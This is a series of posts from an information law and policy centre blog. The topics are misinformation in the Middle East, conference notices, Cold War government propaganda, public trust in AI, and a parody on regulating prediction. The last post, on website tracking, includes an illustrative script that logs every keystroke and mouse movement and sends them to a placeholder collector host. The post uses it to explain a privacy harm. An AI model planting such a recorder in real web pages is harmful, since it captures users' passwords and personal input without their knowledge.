This post is re-posted from the LSE Media Policy Project Blog.

As part of a series of interviews with LSE Faculty on themes related to the Truth, Trust and Technology Commission, Dr Omar Al-Ghazzi talks to LSE MSc student Ariel Riera on ‘echo chambers’ in the context of North Africa and the Middle East.

AR: The spread of misinformation through social media is a main focus of the Commission. Are there similar processes in the Middle East and in the North Africa region?

OA: Questions about trust, divisions within society, and authoritarian use of information or what could be called propaganda are very prevalent in the Middle East and North Africa. So in a way a lot of the issues at hand are not really new if we think about communication processes globally. Much of the attention that misinformation has been getting is in relation to Trump and Brexit. But Syria, for instance, is actually a very productive context to think through these questions, because with the uprising and the war, there was basically an information blackout where no independent journalist could go into the country. This created an environment where witnesses and citizen journalists and activists filled that gap. So it is now a cliché to say that the war in Syria is actually the most documented war. But all that information has not led to a narrative that people understand in relation to what’s happening. And that has to do with trust in digital media and the kind of narratives that the government disseminates. The echo chamber effect in the way people access information from online sources they agree with is also as prevalent in the Middle East as it is globally.

AR: And in these countries, who are the perpetrators of fake news and misinformation and what are the channels?

OA: It is a complicated question because if we talk about the war in Syria, the communication environment is much more complex than the binary division between fake and real. For instance, I am interested in the reporting on the ground in areas that are seeing or witnessing war and conflict. I will give you an example. Now in the suburbs of Damascus, where there is a battle between rebels and the government, there are several cases of children and teenagers doing the reporting. So how should this be picked up by news organisations, and what are the consequences? CNN recently called one of the teenagers based in Eastern Ghouta, Muhammed Najem, a ‘combat reporter’. What are the ethical considerations of that? Does that encourage that teenager to take, for instance, more risks to get that footage? How is what he produces objective if, first, he obviously has no journalism training as a very young person and, second, he is in a very violent context where his obvious interest lies in his own survival and in getting attention for his and his community’s suffering? He has a voice that he wants to be heard and which should be heard. But why is the expectation, if he is dubbed a ‘combat reporter’, that what he produces should be objective news reporting?

Beyond this example of the complex picture in war reporting, I think the Middle East region also teaches us that when there is a lack of trust in institutions of any country in the world, when there is division in society about a national sense of belonging, about what it means to be a patriot or a traitor, that would produce mistrust in the media. Basically, a fractured political environment engenders lack of trust in media, and engenders that debate around fake or real. So there is a layer beyond the fakeness and realness that’s really about social cohesion and political identity.

AR: Nationalist politicians all over the world have found in social media a way to bypass mainstream media and appeal directly to voters. What techniques do they use to do this?

OA: Perhaps in the Middle East you don’t find an example of a stream of consciousness relayed live on Twitter like the case is with President Trump, but, like elsewhere in the world, politicians are on Twitter and even foreign policy is often communicated there. Also, a lot of narratives that feed into conflicts, like the Arab-Israeli conflict, take shape on social media. So without looking at social media you certainly don’t get the full picture even of the geopolitics in the region. Without social media, one would not grasp how government positions get internalised by people and how people contribute – whether by feeding into government policies, or maybe resisting them as well.

AR: Based on your observations in North Africa and the Middle East, can mistrust or even distrust of mainstream media outlets be a healthy instinct? For example, if mainstream media is a place where only one voice is heard.

OA: Even though a lot of the media are politicised in the Arab world because they are government owned, people have access to media other than their own governments’ because of a common regional cultural affiliation, a shared language and the nature of the regional media environment. So actually people in the Arab world are sophisticated media users because they have access to a wide array of media outlets. Of course, there are outlets that are controlled by governments wherever one may be situated and things vary between different countries, but audiences can access pan-Arab news media such as Al Jazeera, Al Arabiya and Al Mayadeen. They have access to a wide array of online news platforms as well as broadcast news. So you really have a lot of choices. If you are a very informed audience member you would watch one news outlet to know, let’s say, what the Iranian position on a certain event is, and then you watch a Saudi-funded channel to see the Saudi position. But of course, most people don’t do that because you know they just access the media that offers the perspective they already agree with.

We have to remember that in the context of the Middle East there are a lot of different conflicts; there is war, which obviously heightens people’s emotions and their allegiances, whatever their worldview is. So we are also talking about a context in which, because of what is happening on the ground, people feel strongly about their political positioning, which feeds into the echo chamber effect.

AR: You wrote that, at least linked to the Arab Spring, there was a ‘diversity of acts referred to as citizen journalism’. What differentiates these practices from the journalism within established media?

OA: Basically, in relation to the 2011 Arab uprisings, there were a lot of academic and journalistic approaches that talked about how these uprisings were Facebook or Twitter revolutions, or only theorising digital media practices through the lens of citizen journalism. But I argued that we cannot privilege one lens to look at what digital media does on the political level because a lot of people use digital media, from terrorist organisations to activists on the ground to government agents. So one cannot privilege a particular use of digital media and focus on that and make claims about digital media generally, when actually the picture is much more complicated and needs to be sorted out more.

Of course the proliferation of smartphones and social media offered ordinary people the opportunity to have their own output, to produce witness videos or write opinions. It is a very different media ecology because of that. However, we cannot take for granted how social media is used by different actors. In social science we have to think about issues of class, literacy, the urban rural divide, the political system, the media system. And, within that complexity, locate particular practices of social media rather than make blanket statements about social media doing something to politics generally and universally.

Dr Omar Al-Ghazzi is Assistant Professor in the Department of Media and Communications at LSE. He completed his PhD at the Annenberg School for Communication, the University of Pennsylvania, and holds MAs in Communication from the University of Pennsylvania and American University and a BA in Communication Arts from the Lebanese American University.

Recent developments on freedom of expression, Dr David Goldberg

Fri, 16/03/2018 - 10:23

This post brings us some recent developments on freedom of expression from Dr David Goldberg, Senior Visiting Fellow, Institute of Computer and Communications Law in the Centre for Commercial Law Studies, Queen Mary, University of London, and member of the Information Law and Policy Centre's Advisory Board.

Dr Goldberg has recently co-organised a symposium at the Southwestern Law School, Los Angeles, on “Fake News and Weaponized Defamation”. The event took place on the 26th January 2018. Further information on the event can be found at: https://www.swlaw.edu/curriculum/honors-programs/law-review-journals/journal-international-media-entertainment-law/global. Photos from the event are available at https://flic.kr/s/aHsmfxk8dL.

Dr Goldberg delivered a presentation at the event calling for enhanced media literacy and cautioning against over-reliance on the law to deal with the so-called phenomenon of fake news. Dr Goldberg's presentation will be available in a forthcoming publication.

In addition, Dr Goldberg has recently published a chapter entitled ‘Dronalism, Newsgathering Protection and Day-to-day Norms’ in Responsible Drone Journalism (2018) edited by Astrid Gynnild and Turo Uskali. The book is available at https://www.crcpress.com/Responsible-Drone-Journalism/Gynnild-Uskali/p/book/9781138059351.

Lastly, following up on the ‘Freedom of Information at 250’ event held at the Free Word Centre in December 2016 with the support of the Information Law and Policy Centre at the Institute of Advanced Legal Studies, and the Embassies of Sweden and Finland, the publication Press Freedom 250 Years: Freedom of the Press and Public Access to Official Documents in Sweden and Finland – A Living Heritage from 1766 is now available in English. The publication of this translation has been in large part due to the efforts of Dr David Goldberg, Mark Weiler and Staffan Dalhoff. The book was launched on 2nd December 2016 at the Swedish Parliament, and the free PDF is available at http://www.riksdagen.se/globalassets/15.-bestall-och-ladda-ned/andra-sprak/tf-250-ar-eng-2018.pdf.

To order the book for libraries, contact:
Riksdag Printing Office, SE 100 12 Stockholm
E-mail: ordermottagningen@riksdagen.se

ILPC Annual Conference and Annual Lecture 2017 – Children and Digital Rights: Regulating Freedoms and Safeguards

Tue, 13/03/2018 - 17:07

ILPC Annual Conference and Annual Lecture 2017
Children and Digital Rights: Regulating Freedoms and Safeguards

The Internet provides children with more freedom to communicate, learn, create, share, and engage with society than ever before. Research by Ofcom in 2016 found that 72 percent of young teenagers in the UK have social media accounts. Twenty percent of the same group have made their own digital music and 30 percent have used the Internet for civic engagement by signing online petitions or by sharing and talking about the news.

Interacting within this connected digital world, however, also presents a number of challenges to ensuring the adequate protection of a child’s rights to privacy, freedom of expression, and safety, both online and offline. These risks range from children being unable to identify advertisements on search engines to being subjects of bullying or grooming or other types of abuse in online chat groups.

Children may also be targeted via social media platforms with methods (such as fake online identities or manipulated photos and images) specially designed to harm them or exploit their particular vulnerabilities and naivety.

These issues were the focus of the 2017 Annual Conference of the Information Law and Policy Centre (ILPC) based at the Institute of Advanced Legal Studies, University of London. The ILPC produces, promotes, and facilitates research about the law and policy of information and data, and the ways in which law both restricts and enables the sharing and dissemination of different types of information.

The ILPC's Annual Conference was one of a series of events celebrating the 70th Anniversary of the founding of the Institute of Advanced Legal Studies. Other events included the ILPC's Being Human Festival expert and interdisciplinary panel discussion on 'Co-existing with HAL 9000: Being Human in a World with Artificial Intelligence'.

At the 2017 ILPC Annual Conference, leading policymakers, practitioners, regulators, key representatives from industry and civil society, and academic experts examined and debated the opportunities and challenges posed by current and future legal frameworks and the policies being used and developed to safeguard these freedoms and rights.

These leading stakeholders included Rachel Bishop, Deputy Director of Internet Policy at the Department for Digital, Culture, Media and Sport (DCMS); Lisa Atkinson, Head of Policy at the Information Commissioner's Office (ICO); Anna Morgan, Deputy Data Protection Commissioner of Ireland; Graham Smith, Internet law expert at Bird & Bird LLP; Renate Samson, former CEO of privacy advocacy organisation Big Brother Watch; and Simon Milner, Facebook's Policy Director for the UK, Africa, and the Middle East.

The legal frameworks under scrutiny included the UN Convention on the Rights of the Child, the related provisions of the UK Digital Charter, and the UK Data Protection Bill, which will implement the major reforms of the much anticipated EU General Data Protection Regulation (2016/679) (GDPR), applicable from 25 May 2018. Key concerns expressed by delegates included the practical effectiveness of, and the lack of evidence-based policy behind, the GDPR's controversial age of consent for children's use of online information services.

Further questions were raised about the impact in practice on children's privacy, freedom of expression, and civil liberties of the new transparency and accountability principles and mechanisms that industry and governments must implement when their data processing involves the online marketing to, or monitoring of, children.

Given the importance and pertinence of these challenging and cutting-edge policy issues, the Centre is delighted that several of the papers presented, discussed, and debated at the conference's plenary sessions and keynote panels – by regulators and academic experts from institutions within the UK, the EU, and beyond – feature in a special issue of Communications Law, the leading peer-reviewed legal journal published by Bloomsbury.

This special issue also includes the Centre’s 2017 Annual Lecture delivered by one of the country’s leading children’s online rights campaigners, Baroness Beeban Kidron OBE, also a member of the House of Lords and film-maker, on ‘Are Children more than Clickbait in the 21st Century?’

For IALS podcasts of the 2017 ILPC Annual Lecture delivered by Baroness Kidron and presentations from the Annual Conference’s Keynote Panel, please see the IALS website at: http://ials.sas.ac.uk/digital/videos.

Nora Ni Loideain
Director and Lecturer in Law,
Information Law and Policy Centre,
IALS, University of London.

5th Winchester Conference on Trust, Risk, Information and the Law, Wednesday 25 April 2018, Winchester, UK

Mon, 12/03/2018 - 11:37

5th Winchester Conference on Trust, Risk, Information and the Law, Wednesday 25 April 2018, Holiday Inn, Winchester, UK

Theme: Public Law, Politics and the Constitution: A new battleground between the Law and Technology?

Keynote speakers will be Michael Barton, Chief Constable of Durham Constabulary, who has spoken recently about the need to reclaim 'sovereignty' over the Internet, and Jamie Bartlett, Director of the Centre for the Analysis of Social Media at Demos, in conjunction with the University of Sussex, and author of several books including 'Radicals' and 'The Dark Net'. Breakout sessions will explore fake news, the use of algorithms in the public sector, infringements over the Internet and other issues. The conference will include the launch of the University of Winchester's new Centre for Parliament and Public Law, with a presentation highlighting the ongoing work of the Department for Digital, Culture, Media and Sport in the area of Data Ethics and Innovation.

For the full conference programme, please visit https://www.winchester.ac.uk/news-and-events/events/event-items/the-5th-winchester-conference-on-trust-risk-information-and-the-law-trilcon18.php

To book, please go to https://store.winchester.ac.uk/conferences-and-events/academic-conferences/faculty-of-business-law-sport/winchester-conference-on-trust-risk-information-and-the-law-2018

British government’s new ‘anti-fake news’ unit has been tried before – and it got out of hand

Tue, 06/02/2018 - 13:44

In this guest post, Dan Lomas, Programme Leader, MA Intelligence and Security Studies, University of Salford, explores the British government’s new ‘anti-fake news’ unit.

The decision to set up a new National Security Communications Unit to counter the growth of “fake news” is not the first time the UK government has devoted resources to exploit the defensive and offensive capabilities of information. A similar thing was tried in the Cold War era, with mixed results.

The planned unit has emerged as part of a wider review of defence capabilities. It will reportedly be dedicated to “combating disinformation by state actors and others” and was agreed at a meeting of the National Security Council (NSC).

As a spokesperson for UK prime minister Theresa May told journalists:

We are living in an era of fake news and competing narratives. The government will respond with more and better use of national security communications to tackle these interconnected, complex challenges.

Parliament’s Digital, Culture, Media and Sport Committee is currently investigating the use of fake news – the spreading of stories of “uncertain provenance or accuracy” – through social media and other channels. The investigation is taking place amid claims that Russia used hundreds of fake accounts to tweet about Brexit. The head of the army, General Sir Nick Carter, recently told the think-tank RUSI that Britain should be prepared to fight an increasingly assertive Russia.

Details of the new anti-fake news unit are vague, but it may mark a return to Britain's Cold War past and the work of the Foreign Office's Information Research Department (IRD), which was set up in 1948 to counter Soviet propaganda. The unit was the brainchild of Christopher Mayhew, Labour MP and under-secretary in the Foreign Office, and grew to become one of the largest Foreign Office departments before its disbandment in 1977 – a story revealed in The Guardian in January 1978 by its investigative reporter David Leigh.

This secretive government body worked with politicians, journalists and foreign governments to counter Soviet lies, through unattributable “grey” propaganda and confidential briefings on “Communist themes”. IRD eventually expanded from this narrow anti-Soviet remit to protect British interests where they were likely “to be the object of hostile threats”.




By 1949, IRD had a staff of just 52, all based in central London. By 1965 it employed 390 staff, including 48 overseas, with a budget of over £1m mostly paid from the “secret vote” used to fund the UK intelligence community. IRD also worked alongside the Secret Intelligence Service (SIS or MI6) and the BBC’s World Service.

Playing hardball with soft power

Examples of IRD's early work include reports on Soviet gulags and the promotion of anti-communist literature. George Orwell's work was actively promoted by the unit. Shortly before his death in 1950, Orwell even gave it a list of left-wing writers and journalists "who should not be trusted" to spread IRD's message. During that decade, the department even moved into British domestic politics by setting up a "home desk" to counter communism in industry.

IRD also played an important role in undermining Indonesia’s President Sukarno in the 1960s, as well as supporting western NGOs – especially the Thomson and Ford Foundations. In 1996, former IRD official Norman Reddaway provided more information on IRD’s “long-term” campaigns (contained in private papers). These included “English by TV” broadcast to the Gulf, Sudan, Ethiopia and China, with other IRD-backed BBC initiatives – “Follow Me” and “Follow Me to Science” – which had an estimated audience of 100m in China.

IRD was even involved in supporting Britain’s entry to the European Economic Community, promoting the UK’s interests in Europe and backing politicians on both sides. It would shape the debate by writing a letter or article a day in the quality press. The department was also involved in more controversial campaigns, spreading anti-IRA propaganda during The Troubles in Northern Ireland, supporting Britain’s control of Gibraltar and countering the “Black Power” movement in the Caribbean.

Going too far

IRD’s activities were steadily getting out of hand, yet an internal 1971 review found the department was still needed, given “the primary threat to British and Western interests worldwide remains that from Soviet Communism” and the “violent revolutionaries of the ‘New Left’”. IRD was a “flexible auxiliary, specialising in influencing opinion”, yet its days were numbered. By 1972 the organisation had just over 100 staff and faced significant budget cuts, despite attempts at reform.

IRD was eventually killed off thanks to opposition from Foreign Office mandarins and the then Labour foreign secretary, David Owen – though that may not be the end of the story. Officials soon set up the Overseas Information Department – likely a play on IRD’s name – tasked with making “attributable and non-attributable” written guidance for journalists and politicians, though its overall role is unclear. Information work was also carried out by “alongsiders” such as the former IRD official Brian Crozier.

The history of IRD’s work is important to future debates on government strategy in countering “fake news”. The unit’s effectiveness is certainly open to debate. In many cases, IRD’s work reinforced the anti-Soviet views of some, while doing little, if anything, to influence general opinion.

In 1976, one Foreign Office official even admitted that IRD’s work could do “more harm than good to institutionalise our opposition” and was “very expensive in manpower and is practically impossible to evaluate in cost effectiveness” – a point worth considering today.

IRD’s rapid expansion from anti-communist unit to protecting Britain’s interests across the globe also shows that it’s hard to manage information campaigns. What may start out as a unit to counter “fake news” could easily spiral out of control, especially given the rapidly expanding online battlefield.

Government penny-pinching on defence – a key issue in current debates – could also fail to match the resources at the disposal of the Russian state. In short, the lessons of IRD show that information work is not a quick fix. The British government could learn a lot by visiting the past.

This article was originally published on The Conversation. Read the original article.

Annual Conference 2017 Resources

Tue, 06/02/2018 - 12:16

The Information Law and Policy Centre held its third annual conference on 17th November 2017. The conference's theme was: 'Children and Digital Rights: Regulating Freedoms and Safeguards'.

The conference brought together regulators, practitioners, civil society, and leading academic experts, who addressed and examined the key legal frameworks and policies being used and developed to safeguard children's digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, the related provisions (such as consent, transparency, and profiling) under the UK Digital Charter, and the Data Protection Bill, which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

Co-existing with HAL 9000: Being Human in a World with AI

Tue, 23/01/2018 - 11:53

This event will focus on the implications posed by the increasingly significant role of artificial intelligence (AI) in society and the possible ways in which humans will co-exist with AI in future, particularly the impact that this interaction will have on our liberty, privacy, and agency. Will the benefits of AI only be achieved at the expense of these human rights and values? Do current laws, ethics, or technologies offer any guidance with respect to how we should navigate this future society?

Organisation: Institute of Advanced Legal Studies
Event date: Monday, 20 November 2017, 5:30pm

Emotion detection, personalisation and autonomous decision-making online

Tue, 23/01/2018 - 11:18

Date: 05 Feb 2018, 17:30–19:30
Institute: Institute of Advanced Legal Studies
Venue: Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Speaker: Damian Clifford, KU Leuven Centre for IT and IP Law

Panel Discussant: Dr Edina Harbinja, Senior Lecturer in Law, University of Hertfordshire.

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law and Policy Centre, Institute of Advanced Legal Studies

Description:

Emotions play a key role in decision-making. Technological advancements are now rendering emotions detectable in real time. Building on the granular insights provided by big data, such developments allow commercial entities to move beyond the targeting of behaviour in advertisements to the personalisation of services, interfaces and other consumer-facing interactions, based on personal preferences, biases and the emotion insights gleaned from the tracking of online activity, profiling and the emergence of 'empathic media'.

Although emotion measurement is far from a new phenomenon, technological developments are increasing the capacity to monetise emotions. From the analysis of, inter alia, facial expressions and voice/sound patterns, to text and data mining and the use of smart devices to detect emotions, such techniques are becoming mainstream.

Many applications of such technologies appear morally above reproach, at least in terms of their goals (e.g. healthcare or road safety) as opposed to the risks associated with their implementation, deployment and potential effects. Their use for advertising and marketing purposes, however, raises clear concerns in terms of the rationality-based paradigm inherent in citizen-consumer protections, and thus the autonomous decision-making capacity of individuals.

In this ILPC seminar, Visiting Scholar Damian Clifford will examine the emergence of such technologies in an online context vis-à-vis their use for commercial advertising and marketing purposes (construed broadly) and the challenges they present for EU data protection and consumer protection law. The analysis will be both descriptive and evaluative, and aims to provide normative insights into the potential legal challenges presented by the commercialisation of emotions online.

Discussant: Dr Edina Harbinja is a Senior Lecturer in Law at the University of Hertfordshire. Her principal areas of research and teaching relate to the legal issues surrounding the Internet and emerging technologies. In her research, Edina explores the application of property, contract law, intellectual property and privacy online. Edina is a pioneer and a recognised expert in post-mortem privacy, i.e. the privacy of deceased individuals. Her research has a policy and multidisciplinary focus and aims to explore different options for regulating online behaviours and phenomena. She has been a visiting scholar and invited speaker at universities and conferences in the USA, Latin America and Europe, and has undertaken consultancy for the Fundamental Rights Agency. Her research has been cited by legislators, courts and policymakers in the US and Europe. Find her on Twitter at @EdinaRl.

A wine reception will follow this seminar.

This event is FREE but advance booking is required.

Book now

Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy

Wed, 17/01/2018 - 12:07

Date: 19 Feb 2018, 17:30–19:30
Venue: Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Description of Presentation:

Despite the World Economic Forum's 2011 report on personal data becoming an asset class, the cost of transacting on personal data is becoming increasingly high, with regulatory risks, societal disapproval, legal complexity and privacy concerns. Professor Irene Ng contends that this is because personal data as an asset is currently controlled by organisations. As a co-produced asset, the person has not had the technological capability to control and process his or her own data or, indeed, data in general. Hence, legal and economic structures have been created only around organisation-controlled personal data (OPD). This presentation will argue that person-controlled personal data (PPD) – technologically, legally and economically architected so that the individual owns a personal micro-server and therefore has full rights to the data within, much like owning a PC or a smartphone – is potentially a route to reducing transaction costs and innovating in the personal data economy. Professor Ng will present the design and incentive alignments of stakeholders on the HAT hub-of-all-things platform (https://hubofallthings.com).

Key Speaker:

Professor Irene Ng, University of Warwick

Professor Irene Ng is the Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick. She is also the Chairman of the Hub-of-all-Things (HAT) Foundation Group (http://hubofallthings.com). A market design economist, Professor Ng is an advisor to large organisations, startups and governments on design of markets, economic and business models in the digital economy. Personal website http://ireneng.com

Panel Discussants:

TBC

Chair:

Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law & Policy Centre, IALS

Wine reception to follow.

People don’t trust AI – here’s how we can change that

Tue, 16/01/2018 - 12:54

In this guest post, Vyacheslav Polonski, Researcher, University of Oxford, examines the key question of trust in – or fear of – AI, and how we interact with it.

Artificial intelligence can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Should you trust Dr. Robot?

IBM's attempt to promote its supercomputer programme Watson for Oncology to cancer doctors was a PR disaster. The AI promised to deliver top-quality recommendations on the treatment of 12 cancers that accounted for 80% of the world's cases. As of today, over 14,000 patients worldwide have received advice based on its calculations.

But when doctors first interacted with Watson, they found themselves in a rather difficult situation. On the one hand, if Watson provided guidance about a treatment that coincided with their own opinions, physicians did not see much value in its recommendations. The supercomputer was simply telling them what they already knew, and these recommendations did not change the actual treatment. This may have given doctors some peace of mind, providing them with more confidence in their own decisions. But IBM has yet to provide evidence that Watson actually improves cancer survival rates.

On the other hand, if Watson generated a recommendation that contradicted the experts’ opinion, doctors would typically conclude that Watson wasn’t competent. And the machine wouldn’t be able to explain why its treatment was plausible because its machine learning algorithms were simply too complex to be fully understood by humans. Consequently, this has caused even more mistrust and disbelief, leading many doctors to ignore the seemingly outlandish AI recommendations and stick to their own expertise.

As a result, IBM Watson’s premier medical partner, the MD Anderson Cancer Center, recently announced it was dropping the programme. Similarly, a Danish hospital reportedly abandoned the AI programme after discovering that its cancer doctors disagreed with Watson in over two thirds of cases.

The problem with Watson for Oncology was that doctors simply didn’t trust it. Human trust is often based on our understanding of how other people think and having experience of their reliability. This helps create a psychological feeling of safety. AI, on the other hand, is still fairly new and unfamiliar to most people. It makes decisions using a complex system of analysis to identify potentially hidden patterns and weak signals from large amounts of data.

Even if it can be technically explained (and that’s not always the case), AI’s decision-making process is usually too difficult for most people to understand. And interacting with something we don’t understand can cause anxiety and make us feel like we’re losing control. Many people are also simply not familiar with many instances of AI actually working, because it often happens in the background.

Instead, they are acutely aware of instances where AI goes wrong: a Google algorithm that classifies people of colour as gorillas; a Microsoft chatbot that decides to become a white supremacist in less than a day; a Tesla car operating in autopilot mode that was involved in a fatal accident. These unfortunate examples have received a disproportionate amount of media attention, emphasising the message that we cannot rely on technology. Machine learning is not foolproof, in part because the humans who design it aren't.

A new AI divide in society?

Feelings about AI also run deep. My colleagues and I recently ran an experiment where we asked people from a range of backgrounds to watch various sci-fi films about AI and then asked them questions about automation in everyday life. We found that, regardless of whether the film they watched depicted AI in a positive or negative light, simply watching a cinematic vision of our technological future polarised the participants’ attitudes. Optimists became more extreme in their enthusiasm for AI and sceptics became even more guarded.

This suggests people use relevant evidence about AI in a biased manner to support their existing attitudes, a deep-rooted human tendency known as confirmation bias. As AI is reported and represented more and more in the media, it could contribute to a deeply divided society, split between those who benefit from AI and those who reject it. More pertinently, refusing to accept the advantages offered by AI could place a large group of people at a serious disadvantage.

Three ways out of the AI trust crisis

Fortunately we already have some ideas about how to improve trust in AI. Simply having previous experience with AI can significantly improve people’s attitudes towards the technology, as we found in our study. Similar evidence also suggests the more you use other technologies such as the internet, the more you trust them.

Another solution may be to open the "black box" of machine learning algorithms and be more transparent about how they work. Companies such as Google, Airbnb and Twitter already release transparency reports about government requests and surveillance disclosures. A similar practice for AI systems could help people gain a better understanding of how algorithmic decisions are made.

Research suggests that involving people more in the AI decision-making process could also improve trust and allow the AI to learn from human experience. For example, one study showed that people who were given the freedom to slightly modify an algorithm felt more satisfied with its decisions, were more likely to believe it was superior, and were more likely to use it in the future.

We don’t need to understand the intricate inner workings of AI systems, but if people are given at least a bit of information about and control over how they are implemented, they will be more open to accepting AI into their lives.

This article was originally published on The Conversation. Read the original article.

A Prediction about Predictions

Tue, 19/12/2017 - 11:33

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Humphrey, I want to do something about predictions.

Indeed, Minister.

Yes Humphrey, the machines are taking over.

Are they Minister?

Yes Humphrey, my advisers tell me I should be up in arms.  Machines – ‘AI’ they call it – predicting what I’m going to buy, when I’m going to die, even if I’ll commit a crime.

Surely not, Minister.

Not me personally, of course, Humphrey – other people.  And then there’s this scandal over Cambridge Analytica and voter profiling.  Has no-one heard of the secret ballot?

Everyone knows which way you would vote, Minister.

Yes, yes, not me personally, of course, Humphrey – other people.  Anyway, I want to do something about it.

Of course, Minister.  Let me see – you want to ban voter and customer profiling, crime risk assessment and predictions of one’s demise, so that would mean no more targeted advertising, political campaigning, predictive policing, early parole releases, life insurance policies…

Well, let’s not be too hasty Humphrey.  I didn’t say anything about banning things.

My sincere apologies Minister, I had understood you wanted to do something.

Yes, Humphrey, about the machines, the AI.  People don’t like the idea of some faceless computer snooping into their lives and making predictions about them.

But it’s alright if a human does it.

Yes…well no…I don’t know.  What do you suggest Humphrey?

As I see it Minister, you have two problems.

Do I?

The people are the ones with the votes; the AI developers are the ones with the money and the important clients – insurance companies, social media giants, dare I say it, even political parties…

Yes, yes, I see.  I mustn’t alienate the money.  But I must be seen to be doing something Humphrey.

I have two suggestions Minister.  First, everything must be ‘transparent’.  Organisations using AI must say how their technology works and what data it uses.  Information, information everywhere…

I like it Humphrey.  Power to the people and all that.  And if they’ve had the information, they can’t complain, eh.  And the second thing?

A Commission, Minister, or a Committee, with eminent members, debating, assessing, scrutinising, evaluating, appraising…

And what is this Commission to do?

“Do” Minister?

What will the Commission do about predictions and AI?

It will scrutinise, Minister, it will evaluate, appraise and assess, and then, in two or three years, it will report.

But what will it say Humphrey?

I cannot possibly predict what the Commission on Predictions would say, being a mere humble servant of the Crown.

Humphrey!

But if I had to guess, I think it highly likely that it will say that context reigns supreme – there are good predictions and there are bad predictions, and there is good AI and there is bad AI.

So after three years of talking, all it will say is that ‘it depends’.

Yes Minister.

In homage to ‘Yes Minister’ by Antony Jay and Jonathan Lynn 

Marion Oswald, Senior Fellow in Law, Head of the Centre for Information Rights, University of Winchester

The Fifth Interdisciplinary Winchester Conference on Trust, Risk, Information and the Law will be held on Wednesday 25 April 2018 at the Holiday Inn, Winchester UK.  Our overall theme for this conference will be: Public Law, Politics and the Constitution: A new battleground between the Law and Technology?  The call for papers and booking information can be found at https://journals.winchesteruniversitypress.org/index.php/jirpp/pages/view/TRIL

How websites watch your every move and ignore privacy settings

Thu, 30/11/2017 - 10:25

In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personal identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.
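Part of the reason is that Do Not Track is only a request: the browser attaches the signal to its traffic and exposes it to page scripts, but honouring it is entirely voluntary. As a purely illustrative sketch (not code from the study), a tracking script that chose to respect the setting might check the standard navigator.doNotTrack property like this:

    // Do Not Track is only a signal: scripts can read it, but nothing
    // in the web platform forces them to respect it.
    // navigator.doNotTrack reports "1" when the user has opted out.
    const dntEnabled: boolean = navigator.doNotTrack === "1";

    if (dntEnabled) {
      console.log("DNT is on: a compliant script would stop recording here.");
    } else {
      console.log("No DNT signal: recording may proceed.");
    }
    // A non-compliant script simply never performs this check.

Because compliance lives entirely in the tracker's own code, the setting offers no technical guarantee.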

The research found that third-party tracking services are used by hundreds of businesses to monitor how users navigate their websites. This monitoring is proving increasingly challenging as more and more companies beef up security and shift their sites over to encrypted HTTPS pages.

To work around this, session-replay scripts are deployed to monitor user interface behaviour on websites as a sequence of time-stamped events, such as keyboard and mouse movements. Each of these events records additional parameters – indicating the keystrokes (for keyboard events) and screen coordinates (for mouse movement events) – at the time of interaction. When associated with the content of a website and web address, this recorded sequence of events can be exactly replayed by another browser that triggers the functions defined by the website.
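To make that mechanism concrete, the sketch below shows how such a recorder can be built with standard browser APIs. This is our own minimal illustration, not the Princeton team's code or any vendor's script; the collector URL and the five-second batching interval are invented for the example.

    // Minimal sketch of a session-replay recorder: user input is captured
    // as time-stamped events and periodically shipped to a third party.
    interface ReplayEvent {
      type: string;   // "keydown" or "mousemove"
      time: number;   // milliseconds since the page loaded
      key?: string;   // the keystroke, for keyboard events
      x?: number;     // pointer coordinates, for mouse events
      y?: number;
    }

    const buffer: ReplayEvent[] = [];

    // Every keystroke is recorded as it is typed -- before any form is
    // submitted, and regardless of whether the text is later deleted.
    document.addEventListener("keydown", (e: KeyboardEvent) => {
      buffer.push({ type: "keydown", time: performance.now(), key: e.key });
    });

    // Mouse movements are recorded as time-stamped coordinates.
    document.addEventListener("mousemove", (e: MouseEvent) => {
      buffer.push({
        type: "mousemove",
        time: performance.now(),
        x: e.clientX,
        y: e.clientY,
      });
    });

    // Ship the accumulated batch to the collector every five seconds.
    setInterval(() => {
      if (buffer.length === 0) return;
      navigator.sendBeacon(
        "https://collector.example.com/replay", // hypothetical endpoint
        JSON.stringify(buffer)
      );
      buffer.length = 0; // reset for the next batch
    }, 5000);

Replayed against a copy of the same page, a stream like this reconstructs the session step by step, which is why text typed into a form – including a password – can reach the third party even if the user deletes it before submitting.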

What this means is that a third party is able to see, for example, a user entering a password into an online form – which is a clear privacy breach. Websites employ third-party analytics firms to record and replay such behaviour, they argue, in the name of "enhancing user experience". The more they know about what their users are after, the easier it is to provide them with targeted information.

